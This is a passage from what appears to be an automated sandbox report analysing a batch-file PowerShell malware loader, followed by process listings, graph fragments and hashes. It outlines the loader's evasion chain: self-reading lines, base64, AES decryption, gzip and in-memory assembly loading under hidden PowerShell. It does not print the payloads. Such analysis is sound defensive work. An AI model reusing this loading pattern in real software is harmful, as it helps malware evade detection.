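                  Once rewritten, the chain reads directly: the echo sets the console title to the .bat path, File.ReadLines([Console]::Title) re-reads the batch file, Enumerable.ElementAt picks the lines at zero-based indexes 5 and 6 and Substring(2) drops their first two characters, then FromBase64String, AES-CBC/PKCS7 CreateDecryptor plus TransformFinalBlock with the fixed key and IV, GZipStream Decompress via CopyTo, and finally Assembly.Load followed by EntryPoint.Invoke for each blob. The key decodes to 32 bytes (AES-256) and the IV to 16. Because both are constants, the two payloads can be recovered from the batch file with the same chain without running it; the report does not reproduce those two lines, so the script stops at the material needed to do that. The loader's own `powershell -w hidden` statement is consistent with the second powershell.exe instance listed as Target ID 6.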

                  Target ID:5
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:6
                  Start time:10:05:58
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:1.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:8
                    Total number of Limit Nodes:1
                    Execution graph (rendered image not reproduced; nodes and edges recovered from the graph source):
                    7ffd9b8a45ea -> 7ffd9b8efc40 (GetFileType) -> 7ffd9b8efcc4
                    7ffd9b8ad4f9 -> 7ffd9b8ad50f -> 7ffd9b8ad552
                    7ffd9b8ad50f -> 7ffd9b8ad67d (CreateFileW) -> 7ffd9b8ad6de

                    Control-flow Graph

                    Legend: Executed / Not Executed
                    Control-flow graph for the function at 7ffd9b8a6e30 (rendered image not reproduced). Recovered from the graph source: basic blocks run from 7ffd9b8a6e30 to 7ffd9b8acf2d, with calls to 7ffd9b8a4620, 7ffd9b8a7c18, 7ffd9b8a7bc8, 7ffd9b8acf2e and 7ffd9b8a2ed8.
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZL_H
                    • API String ID: 0-3109080135
                    • Opcode ID: a66f5fb573f0c62edb0dfba7547fcc4e12b430291a7f86e998c0ad75d73ffc49
                    • Instruction ID: a6322e33baa8473d7afaa039702a7418d02bf71f318add641a2d0f7f9bbc417d
                    • Opcode Fuzzy Hash: a66f5fb573f0c62edb0dfba7547fcc4e12b430291a7f86e998c0ad75d73ffc49
                    • Instruction Fuzzy Hash: D8424831B19A4E4FEB9CDB2C88656B573D2FF99310F1441BAD05EC72E6DE35A8428780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 280b12a183fb1455493e3992454f50d4f2cdb61e00ac646047d74180fcc740e1
                    • Instruction ID: 4e911cf3e1cc0829262934a45e4ac88145f219df0762167cfa894c79ff645eff
                    • Opcode Fuzzy Hash: 280b12a183fb1455493e3992454f50d4f2cdb61e00ac646047d74180fcc740e1
                    • Instruction Fuzzy Hash: 5E71F671A0DA484FDB58DF6CD8556A97BE0FF59320F0442BEE049D32A2DF24A8028781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 231 7ffd9b8a45da-7ffd9b8ad673 235 7ffd9b8ad675-7ffd9b8ad67a 231->235 236 7ffd9b8ad67d-7ffd9b8ad6dc CreateFileW 231->236 235->236 237 7ffd9b8ad6de 236->237 238 7ffd9b8ad6e4-7ffd9b8ad70c 236->238 237->238
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction ID: f4e427c6e80c2414a82e948a563d1b98d3f9fc36409eea0e101c92e79d5b4bc4
                    • Opcode Fuzzy Hash: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction Fuzzy Hash: 7F31A27191CA1C8FDB58EF58D845AF977E0FB69721F10422EE04EE3251DB70A8028BC1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 240 7ffd9b8a45ea-7ffd9b8efcc2 GetFileType 244 7ffd9b8efcca-7ffd9b8efcef 240->244 245 7ffd9b8efcc4 240->245 245->244
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction ID: 1e18795d65b83358bee11c003991a0802b2518befa5ea40affb0a9df091602a4
                    • Opcode Fuzzy Hash: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction Fuzzy Hash: EE21B530A08A0C9FDB5CEB98D845BF977E0FB59321F10422ED049D3651DB71A812CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000006.00000002.1719618393.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ef2cfd1dcca4d46f89b9a86623f8607f510ac09824fd422f1f50168b7a7631f4
                    • Instruction ID: 985fbe2c436c24de8003bdf09ebf67ac928ffe8cf3d0d681535ff2dd665c9355
                    • Opcode Fuzzy Hash: ef2cfd1dcca4d46f89b9a86623f8607f510ac09824fd422f1f50168b7a7631f4
                    • Instruction Fuzzy Hash: 7B123921B1F7D92FE76A876858A15B47BE1EF52314B0A01FBD088C71F3EA189D068352
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: NL_^$^
                    • API String ID: 0-2447703788
                    • Opcode ID: 8762004bd090f6621f36bba165033fa2e3ebea45b2d18b39a0a9917d20ce9dea
                    • Instruction ID: e6c0ca5d5b2ace2d1583755220e63352966ee37ed4cfad93ef22b2ae0f2f65dc
                    • Opcode Fuzzy Hash: 8762004bd090f6621f36bba165033fa2e3ebea45b2d18b39a0a9917d20ce9dea
                    • Instruction Fuzzy Hash: 5BD15652B0D9A64AD32AB3BD7C755FD7B40DF85338B0942BBC18D8B0E7A908644783D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: _K_H
                    • API String ID: 0-2344692464
                    • Opcode ID: 3d729e8e9906ce062121ea85763f8872910ab35e953c4f844ab22203bbf3194f
                    • Instruction ID: 7e892242cd3ffa55faaa4b7ffd8d8b765e1e88e035a97ebf1a3187ed3c457d47
                    • Opcode Fuzzy Hash: 3d729e8e9906ce062121ea85763f8872910ab35e953c4f844ab22203bbf3194f
                    • Instruction Fuzzy Hash: 9142A431B1991E4FEBA4EB6CD864A6977E1FF9C340F0505B9E44DC32A6DE24E8418B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: eJ_^
                    • API String ID: 0-3379264260
                    • Opcode ID: 4b525855e0cd93730458f67a746bb80e6ea657ffe252c0b647dfe6a82e8810da
                    • Instruction ID: 3797be61c5196aa83672cc10b5945ac409a2a23135382a1a62aee510b62658ca
                    • Opcode Fuzzy Hash: 4b525855e0cd93730458f67a746bb80e6ea657ffe252c0b647dfe6a82e8810da
                    • Instruction Fuzzy Hash: A322F630B1DA4A4BE76CE768946267573C2FFD8740F45427EE04EC32D7DE29B9028681
                    Uniqueness

                    Uniqueness Score: -1.00%